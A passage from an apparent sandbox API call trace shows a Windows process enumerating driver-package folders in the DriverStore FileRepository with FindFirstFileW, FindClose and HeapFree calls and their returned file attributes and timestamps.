lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iastorv.inf_amd64_neutral_668286aa35d55928\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x394e6c37, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3be8ed84, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3be8ed84, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.440] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.440] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.440] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\igdlh.inf_amd64_neutral_54a12b57f547d08e\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3f35365b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60d4a63a, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60d4a63a, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.445] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.445] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp.inf_amd64_neutral_25c14d33af7f54f1\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425504b7, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61dcdef8, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61dcdef8, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.446] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.446] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.448] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iirsp2.inf_amd64_neutral_9ed65fe0bab06b1b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x425e8a38, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61df4058, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61df4058, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.449] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.449] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.449] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\image.inf_amd64_neutral_4a983035eaabe2f4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3ed860b0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60b5b456, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60b5b456, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.449] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.450] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.450] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\input.inf_amd64_neutral_8693053514b10ee9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3904a18f, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x83f9555a, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x3bcc5d01, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.451] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.451] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.451] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ipmidrv.inf_amd64_neutral_1cb648411f252d13\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a45fb54, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c35198d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c35198d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.452] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.452] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\iscsi.inf_amd64_neutral_2ef24e9270d8b2a9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a37b312, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c32b82d, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c32b82d, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.452] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.453] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.453] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\keyboard.inf_amd64_neutral_0684fdc43059f486\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38f1968d, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3bc538e0, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3bc538e0, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.453] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.454] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.454] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ks.inf_amd64_neutral_2b583ce4a6a029a1\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x39d0983c, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x5f745a91, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x5f745a91, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.454] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.455] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\kscaptur.inf_amd64_neutral_6cb3fb6811a3f83d\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e720584, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.455] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.455] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.455] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\ksfilter.inf_amd64_neutral_86311fdf78a07678\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e7b8b05, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60a76c14, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60a76c14, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.456] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.456] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_fc.inf_amd64_neutral_a7088f3644ca646a\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41838b9f, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x617683cc, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x617683cc, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.456] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.456] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.456] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas.inf_amd64_neutral_a4d6780f72cbd5b4\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x418f7280, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x61826aae, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x61826aae, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.457] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.457] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.457] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_sas2.inf_amd64_neutral_e12a5c4cfbe49204\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4198f801, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6190b2ef, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6190b2ef, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.458] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.458] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\lsi_scsi.inf_amd64_neutral_cfbbf0b0b66ba280\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x41a27d82, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x619efb31, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x619efb31, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.458] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.458] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.458] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\machine.inf_amd64_neutral_a2f120466549d68b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x38b87586, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x45ea362b, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x45ea362b, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.491] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.491] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.491] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mchgr.inf_amd64_neutral_407146dba80d1566\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3a1d83ef, ftCreationTime.dwHighDateTime=0x1cb892c, ftLastAccessTime.dwLowDateTime=0x3c2932ac, ftLastAccessTime.dwHighDateTime=0x1cb892c, ftLastWriteTime.dwLowDateTime=0x3c2932ac, ftLastWriteTime.dwHighDateTime=0x1cb892c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.494] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.494] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.494] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mcx2.inf_amd64_neutral_8cf9cade8f7bba56\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x3e8e9608, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x60ac2ed5, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x60ac2ed5, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.495] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.495] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm3com.inf_amd64_neutral_11abcf129a29fb9f\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x491c4fdf, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x66e96a2d, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x66e96a2d, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.495] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.495] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.495] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdm5674a.inf_amd64_neutral_46f893a4f998bb46\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x492a9820, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.496] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.496] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.496] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmadc.inf_amd64_neutral_62d6e6995428f9d0\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4938e062, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6711e191, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6711e191, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.496] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.496] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.497] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmagm64.inf_amd64_neutral_ef322a8cc2738a9b\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x5023e02e, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bf5f562, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bf5f562, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.498] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.498] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmags64.inf_amd64_neutral_e68956e24e287714\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x50394c90, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6bfab822, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6bfab822, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.498] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.498] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.498] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmairte.inf_amd64_neutral_0feacd08cb9c7fe3\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494265e3, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671442f2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671442f2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.499] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.499] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.502] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa.inf_amd64_neutral_560c956da9bcd8f5\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x494beb64, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.503] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.503] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa3.inf_amd64_neutral_77e515342bd572cc\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x495c9506, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x6716a452, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x6716a452, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.503] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.503] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.503] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa4.inf_amd64_neutral_6e97842bb8d9e6a8\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x496add48, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671905b2, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671905b2, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.504] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.504] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwa5.inf_amd64_neutral_ea8128ac5da37eb9\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4976c429, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x671dc873, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x671dc873, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.504] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.504] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.504] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmaiwat.inf_amd64_neutral_213e93b5ced8b0fe\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x498049aa, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x672029d3, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x672029d3, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.505] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.505] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Windows\\system32\\DriverStore\\FileRepository\\mdmar1.inf_amd64_neutral_b8ebf59556c3dbf0\\*", lpFindFileData=0x46b4e8 | out: lpFindFileData=0x46b4e8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x4989cf2b, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x67228b33, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x67228b33, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x45be80 [0028.506] FindClose (in: hFindFile=0x45be80 | out: hFindFile=0x45be80) returned 1 [0028.506] HeapFree (in: hHeap=0x420000, dwFlags=0x0, lpMem=0x46b4e8 | out: hHeap=0x420000) returned 1 [0028.506] FindFirstFileW (in: 